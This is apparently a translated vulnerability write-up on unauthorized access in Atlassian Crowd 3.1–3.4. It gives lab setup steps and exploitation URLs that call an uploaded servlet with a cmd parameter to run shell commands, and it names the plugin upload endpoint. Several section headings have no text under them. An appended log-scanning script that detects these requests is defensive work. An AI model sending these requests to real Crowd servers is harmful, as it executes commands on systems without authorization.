Unauthorized Access Vulnerability: Atlassian Crowd
0x01 Vulnerability Summary
0x02 Risk Level
0x03 Vulnerability Details
0x04 Affected Versions
3.1.0 <= version < 3.1.6
3.2.0 <= version < 3.2.8
3.3.0 <= version < 3.3.5
3.4.0 <= version < 3.4.4
0x05 Environment Setup
Attacker machine: kali 5.5.0
wget https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zip
sudo apt-get install openjdk-8-jdk
java -version
unzip atlassian-crowd-3.4.3.zip
sudo cp -r atlassian-crowd-3.4.3 /var/
cd /var/atlassian-crowd-3.4.3/crowd-webapp/WEB-INF/classes/
sudo vi crowd-init.properties   # edit the config file and add the line below
crowd.home=/var/atlassian-crowd-3.4.3
Start the service
sudo sh start_crowd.sh
http://172.16.16.213:8095/
Go to the official site https://my.atlassian.com/products/index and click New Trial License to request a license key
0x06 Exploitation
URL: http://172.16.16.213:8095/crowd/plugins/servlet/exp?cmd=ifconfig
http://172.16.16.213:8095/crowd/plugins/servlet/exp?cmd=<command>
0x07 Remediation Advice
https://www.atlassian.com/zh/software/crowd
/crowd/admin/uploadplugin.action
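The two request patterns this page shows are the plugin upload endpoint listed above and the cmd-parameter servlet URL from the exploitation section. The following detection script, added here as an example and not part of the original write-up or of Atlassian's code, flags both in web-server access logs; the log lines and client addresses are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format assumed) for illustration only.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2020:10:01:02 +0000] "GET /crowd/console/login.action HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2020:10:02:11 +0000] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 200 312
10.0.0.9 - - [12/Mar/2020:10:02:30 +0000] "GET /crowd/plugins/servlet/exp?cmd=ifconfig HTTP/1.1" 200 1024
10.0.0.7 - - [12/Mar/2020:10:03:00 +0000] "GET /crowd/plugins/servlet/applinks/listEntityLinks HTTP/1.1" 200 640
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_ENDPOINT = "/crowd/admin/uploadplugin.action"  # endpoint named in the remediation section
SERVLET_PREFIX = "/crowd/plugins/servlet/"             # path used by the servlet in the exploitation section


def classify(line):
    """Return (rule, client_ip, target) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Any hit on the plugin upload action is worth reviewing, regardless of method or status.
    if parts.path == UPLOAD_ENDPOINT:
        return ("plugin-upload", m.group("ip"), m.group("target"))
    # A plugin servlet taking a "cmd" query parameter matches the pattern shown on this page.
    if parts.path.startswith(SERVLET_PREFIX) and "cmd" in parse_qs(parts.query, keep_blank_values=True):
        return ("servlet-cmd", m.group("ip"), m.group("target"))
    return None


def scan(log_text):
    """Scan a whole log and return the list of suspicious hits in order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for rule, ip, target in scan(SAMPLE_LOG):
        print(f"[{rule}] {ip} -> {target}")
```

Legitimate administrative plugin uploads will also match the first rule, so correlate hits with an authenticated admin session before escalating.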